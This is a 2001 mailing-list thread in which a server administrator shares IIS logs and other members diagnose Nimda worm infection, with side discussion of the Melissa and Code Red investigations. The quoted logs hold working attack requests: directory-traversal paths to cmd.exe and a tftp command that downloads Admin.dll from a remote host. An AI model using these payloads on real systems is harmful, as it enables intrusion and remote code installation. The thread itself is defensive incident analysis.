Thanks. Then that means you are infected. Those other machines are making TFPT requests to you because you hit one of their backdoors to make it request admin.dll from you. So, you are the attacker in those cases. The directory requests coming to you are coming from other infected machines. So, you are the target in those cases. You're infected! Time to clean up. Jimmy > -----Original Message----- > From: dldean@private [SMTP:dldean@private] > Sent: Friday, September 21, 2001 2:22 PM > To: Kuo, Jimmy > Cc: crime@private > Subject: RE: [RE: Any leads?] > > This is 206.98.124.52 receiving get requests for the admin.dll from > 206.98.79.246 and directory requests for his machine from 206.252.224.50 > & > 208.238.181.162 . > > Doug > > > -----Original Message----- > > From: owner-crime@/var/spool/majordomo/lists/crime > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, > > Jimmy > > Sent: Friday, September 21, 2001 2:06 PM > > Cc: crime@private > > Subject: RE: [RE: Any leads?] > > > > > > Oh, I didn't notice the followup questions you asked the first time. > > > > I don't know about the structure of your logs. But are you > 206.98.124.52? > > > > Could someone who reads IIS logs say if this is him sending or receiving > > GETs? > > > > And this is definitely Nimda. I just don't know if you're the > > target or the > > culprit. If you haven't upgraded, I'm tempting to believe you're > infected > > and attacking others. The TFTP command shows up only on or after > > infection. > > And ADMIN.DLL (Nimda is admin spelt backwards) is also something > > that shows > > up after infection. But then you say you don't have it... > > > > Jimmy > > > > > -----Original Message----- > > > From: J.Michael Cuciti [SMTP:mcuciti@private] > > > Sent: Friday, September 21, 2001 1:44 PM > > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri > > > Cc: crime@private > > > Subject: Re: [RE: Any leads?] > > > > > > All: > > > > > > I still have a script trying to run, but the location and folder > doesn't > > > exist. The is what I found in my log file: > > > > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, > 151, > > > 304, > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll, > > > > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, > 151, > > > 304, > > > 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, > > > /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll, > > > > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, > 72, > > > 273, > > > 403, 5, GET, /scripts/root.exe, /c+dir, > > > > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, > 96, > > > 1652, > > > 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, > > > > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, > 97, > > > 243, > > > 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, > > > > > > If anybody knows what this is, please 'spain it to me. > > > > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't ungraded, I > > inherited this, not > > > my > > > fault :-) ) > > > > > > In the event log I see this same type of message running every few > > > minutes. > > > The script is supposedly running from > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist. > > > > > > Thanks... > > > > > > Mike Cuciti > > > Network Service and Support MAnager > > > Tuality Healthcare > > > 681.1749 > > > > > > > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote: > > > >The Melissa author was caught because he posted the infectious > > document > > > >from his own AOL account to a news group, rather than releasing it > > > >through a hacked account. His guilt was confirmed when the > > serial number > > > >in the document matched the PC in the dumpster outside his bedroom > :-) > > > > > > No. He used a hacked acct. But we identified the exact time of the > use > > > of > > > the acct (newsgroup posting message ID) and the FBI traced the phone > > > records. > > > > > > And the PC was destroyed and never located. > > > > > > Where did you get your version of the story? > > > > > > >But Code Red and its derivatives is not an Office document, and > > > >therefore has no serial numbers. That investigators appear to have no > > > >leads months after Code Red appeared tells me that it was likely > > > >released to the wild from a compromised machine, or perhaps > > > >simultaneously released from multiple compromised machines. If the > > > >author(s) were good, then those compromised machines were initially > > > >attacked from other compromised machines. Likely all of these initial > > > >release vector machines have long since been wiped and > > re-installed, and > > > >the links to the author(s) have been cut. > > > > > > We have some "first instances" of traffic. I don't know what the > FBI's > > > doing with the information gathered so far. But I agree that it's > > > difficult > > > and not likely. > > > > > > Jimmy > >
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:45 PDT